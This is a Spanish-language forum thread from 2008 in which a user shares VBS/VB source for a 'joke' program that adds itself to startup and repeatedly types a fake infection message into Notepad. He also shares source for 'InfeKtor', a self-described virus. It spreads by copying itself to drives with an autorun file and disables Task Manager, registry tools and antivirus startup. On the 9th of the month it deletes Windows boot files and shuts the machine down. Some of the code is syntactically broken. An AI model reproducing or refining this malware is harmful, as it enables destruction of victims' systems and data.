Mi proyecto broma en vbs

Iniciado por Enemy, 11 Octubre 2008, 22:03 PM

0 Miembros y 1 Visitante están viendo este tema.

Enemy

Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto..

Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado.  >:D
Buena aca el code, es bastante simple :

Private Sub Form_Load()

'Declaro algunas variables

Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar

On Error Resume Next

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"     

              'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"

              'En este tambien, deben dejar solo uno, es opcional

Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"

              ' Se copia asi mismo, en la ruta donde sera buscado luego en el registro

Do
Wscript.sleep 70000   
      ' No hara nada por 1,10 minutos y despues ejecuta el block de notas

Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500      ' Le da tiempo al notepad para que se termine de abrir

WSSvar.AppActivate Molesto.processid
        ' Esto hara que coloque las palabras sobre el block de notas

Wscript.sleep 700                   'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid

         'Envia pulsaciones de teclado que se escribiran sobre el notepad.
         'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     #       #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\  #   #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/  #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#    #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#   #     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/      #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-#     # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ #    #  #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | #   #   #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/   #  #    #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#      #  #     #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#     #   #      #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./    #       #"
Loop       'Se repite nuevamente
 

End Sub


pueden hacer este agregado si quieren o bien cambiarlo por:


Dim WSSvar

Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"


pero en caso de agregarlo se iniciarian dos..

jaja no se pregunten porque tiene ese nombre "sexDonkey"  :xD :xD

voy a seguir trabajando en el, espero que quede bueno.




SALUD.O.S

Novlucker

Ahora entiendo porque el problema con el sleep .....

Es que en vbs, si al sleep le pones esperas muy grandes... muere  :xD.

Lo mejor sería utilizar un timer (lo estas haciendo en VB) en una función, y cuando lo necesites lo llamas.

Saludos  ;)
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Enemy

#2
Cita de: Novlucker en 11 Octubre 2008, 22:08 PM
Ahora entiendo porque el problema con el sleep .....

Es que en vbs, si al sleep le pones esperas muy grandes... muere  :xD.

Es verad jaja pero al exe tambien se lo cierra y listo, fue..

La idea es ponerle el nombre de algu nombre como svchost.exe o winlogon, explorer.exe  :xD :xD :xD

Es asi nomas, la idea es dejar las mejores funciones para los virus y demas..

tengo tres proyectos: dos virus y una broma.. InfeKtor, V-InfeKtor y K-Joke  :xD

Este es el del InfeKtor :

'-------------------------------------------------------_____##########____-------------------------------------------------
'0111001011011000111010010100000100010001100111011100100\--_--_--_--_--_--/0101011101001010010100100001000100100110001010011
'-------------------------------------------------------/   INFEKTOR 2.4  \-------------------------------------------------
'0101011101001010010100100001000100100110001010011011001\ +--+---+---+--+ /1001011011000111010010100000100010001100111011100
'-------------------------------------------------------/  By: Bakura182  \-------------------------------------------------
'0101100111010111010101011101001110001101010111110100100�������������������0101111101001000101011101000100100110001010010011
'---------------------------------------------------------------------------------------------------------------------------



'Aca defino todas las variables a usar

Dim Batch
Dim InfKFSOvar
Dim CodigoAutoR
Dim InfKWSSvar
Dim EjecChauIniW
Dim i
Dim x
Dim Uni

'Empiezo creando la carpeta que almacenara el virus InfeKtor

On error resume next

Set InfKFSOvar = CreateObject("Scripting.FileSystemObject")
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor"
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
'Se copia asi mismo
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
'Se crea el autorun con las opciones de abrir, explorar y escaneo falso de virus
Set CodigoAutoR = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf",True)
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "[Autorun]"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "shell\1=Abrir"
CodigoAutoR.WriteLine ";mpaF3AkDI2KK5awial3lK43w4Dl3JesLKrj0iL9DcsSo9waO2349wdlk"
CodigoAutoR.WriteLine "shell\1\command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";8lkakfo431kip3dsoe2Daw53dqJsDKKcJalJoof70osK43LKfC0UksswlLksZko5jkL5qsK434LiJe2j"
CodigoAutoR.WriteLine "shell\1\default=1"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9loe5200Ds49LIr8LqXckkKewpAc9oiskk0K4i2arwL30533o4Kdsrajsairwr38al"
CodigoAutoR.WriteLine "Shell\2=Explorar"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5jiie23AJa2awkakf28kDp
CodigoAutoR.WriteLine "Shell\2\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5ji
CodigoAutoR.WriteLine "Shell\5=Escanear virus"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "Shell\5\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9l53REsdSdf3f4gFw692oaA9al"
CodigoAutoR.WriteLine "1=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "2=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "5=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2A3Rsa3L"
CodigoAutoR.Close

'Se crea un bat que le a�ade atributos al virus y demas y que se los saca a otros.. jeje
'Volviendolos visibles para usuarios inexpertos y lograr asi que se autodestruyan el inicio de W
'sino a esperar hasta el nueve como mas abajo se vera

Set Batch = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat",True)
Batch.WriteLine "@echo off"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor"
Batch.WriteLine "attrib -h -r -s C:\IO.sys"
Batch.WriteLine "attrib -h -r -s C:\COMAND.com
Batch.WriteLine "attrib -h -r -s C:\NTDETECT.bat"
Batch.WriteLine "attrib -h -r -s C:\boot.ini"
Batch.WriteLine "attrib -h -r -s C:\MSDOS.sys"
Batch.WriteLine "attrib -h -r -s C:\bootfont.bin"
Batch.WriteLine "attrib -h -r -s C:\ntldr.sys"
Batch.WriteLine "attrib -h -r -s C:\pagefile.sys"
Batch.WriteLine "attrib -h -r -s C:\IO.sys "
Batch.WriteLine "attrib -h -r -s C:\AUTOEXEC.bat"
Batch.WriteLine "attrib -h -r -s C:\CONFIG.sys"
Batch.WriteLine "attrib -h -r -s C:\Windows\WIN.ini
Batch.WriteLine "attrib -h -r -s C:\Windows\SYSTEM.ini
Batch.WriteLine "attrib -a -h -r -s C:\Config.Msi"
Batch.WriteLine "attrib -a -h -r -s C:\RECYCLER"
Batch.WriteLine "attrib -a -h -r -s C:\System Volume Information"
Batch.WriteLine "exit"
Batch.close

'tengo que pasarlo a VBS mejor, no conviene ejecutar un bat ya que saltaria la consola y es muy llamativa..

'Ejecuto el bat

Set InfKWSSvar = CreateObject("WScript.Shell")
InfKWSSvar.Run "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Y lo borro, ya que es muy facil editarlo y hacer lo contrario... ��'


InfKFSOvar.DeleteFile "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"


'Se guarda en el registro y otras opciones
InfKWSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden",0,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",2,"REG_DWORD")

InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden",1,"REG_DWORD")

InfKWSSvar.regwrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1")

InfKWSSvar.regwrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD")

InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD")

'Aca quiero agregar la mayor cantidad de AV para que no se inicien, solo llevo dos =( ..

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NAV Agent"

InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kav"



'Si el dia es distinto a 9 entonces procede a crear una copia de si mismo con un nombre diferente, sino borra los archivos de arranque de windows, sin ellos windows no arranca


if Day(Now()) <> 9 then
Wscript.sleep 10000
Randomize
Azar = Int(Rnd * 10)
If Azar = "0" Then Nombre = "Password Generator"
If Azar = "1" Then Nombre = "Install K-raoke"
If Azar = "2" Then Nombre = "SysUtils"
If Azar = "3" Then Nombre = "UnistallerX"
If Azar = "4" Then Nombre = "Mk2"
If Azar = "5" Then Nombre = ""
If Azar = "6" Then Nombre = "Messenger error"
If Azar = "7" Then Nombre = "Iexplorer"
If Azar = "8" Then Nombre = "Abu"
If Azar = "9" Then Nombre = "EasyWeb"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Mis documentos" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Adminstrador\Escritorio" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\All Users\Escritorio
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\Usuario\Escritorio"," & Nombre & ".exe"

'Tendria que crear algo que despues ejecute a cualquiera de ellos, sino es en vano jaja

else
On error resume next
InfKFSOvar.DeleteFile "C:\IO.sys"
InfKFSOvar.DeleteFile "C:\AUTOEXEC.bat"
InfKFSOvar.DeleteFile "C:\CONFIG.sys"
InfKFSOvar.DeleteFile "C:\COMAND.com"
InfKFSOvar.DeleteFile "C:\NTDETECT.bat"
InfKFSOvar.DeleteFile "C:\Windows\WIN.ini"
InfKFSOvar.DeleteFile "C:\boot.ini"
InfKFSOvar.DeleteFile "C:\MSDOS.sys"
InfKFSOvar.DeleteFile "C:\bootfont.bin"
InfKFSOvar.DeleteFile "C:\ntldr.sys"
InfKFSOvar.DeleteFile "C:\pagefile.sys"
InfKFSOvar.DeleteFile "C:\Windows\SYSTEM.ini"
InfKFSOvar.DeleteFolder "C:\Config.Msi"
InfKFSOvar.DeleteFolder "C:\RECYCLER"
InfKFSOvar.DeleteFolder "C:\System Volume Information".DeleteFile "C:\IO.sys"
End if
'Crea otro bat que apaga el ordenador y  avisa que ha sido victima del infeKtor (tarde el aviso pero bueh,ja)

Set ChauIniW = InfKFSOvar.CreateTextFile ".\Salud.o.s.bat,True"
ChauIniW.Writeline "@echo off"
ChauIniW.Writeline "Shutdown -s -t 5 -c Has_Sido_Victima_Del_InfeKtor..."
ChauIniW.Writeline "Exit"
ChauIniW.Close
Set EjecChauIniW = CreateObject("WScript.Shell")
EjecChauIniW.Run ".\Salud.o.s.bat"
End if
'Propagacion por unidades
' he aqui el ejemplo tuyo de propagacion

Set FSOvar = createobject("scripting.filesystemobject")
Set uni = FSOvar.drives

For each x in uni
If x.driveletter <> "A" and x.drivetype = 1 then
FSOvar.copyfile wscript.scriptfullname, x.driveletter &":\"
msgbox "contagio en " & x.driveletter
End If
Next


Debo remplazar el bat por codigo en vbs , con los atributos en 39, pero lo hago despues, estoy muy ocupado con el estudio jaja



SALUD.O.S

Enemy

Ahora que lo leo bien....

Me falto copiar el autorun en las unidades extraibles.!!   :¬¬ :¬¬ :¬¬ :¬¬

todavia esta en construccion, todos los dias trabajo un poquitito en ellos, si tengo tiempo claro..



SALUD.O.S

aaronduran2

¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.

Saludos.

Novlucker

Cita de: aaronduran2 en 11 Octubre 2008, 22:54 PM
¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.
Saludos.

Porque piensa compilarlo con VB :P
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Enemy

Ya se que es de VB..  :¬¬

Se me mezclan las cosas, los pruebo en VBS y los paso a VB cambiando un par de cosas..

En resumen, se me fue de manos..  :rolleyes:

Ahora lo edito... para la gente que le molesta ver eso ahi  >:D


SALUD.O.S

aaronduran2

No hace falta hombre, lo que pasa es que no me coincidía.

Saludos.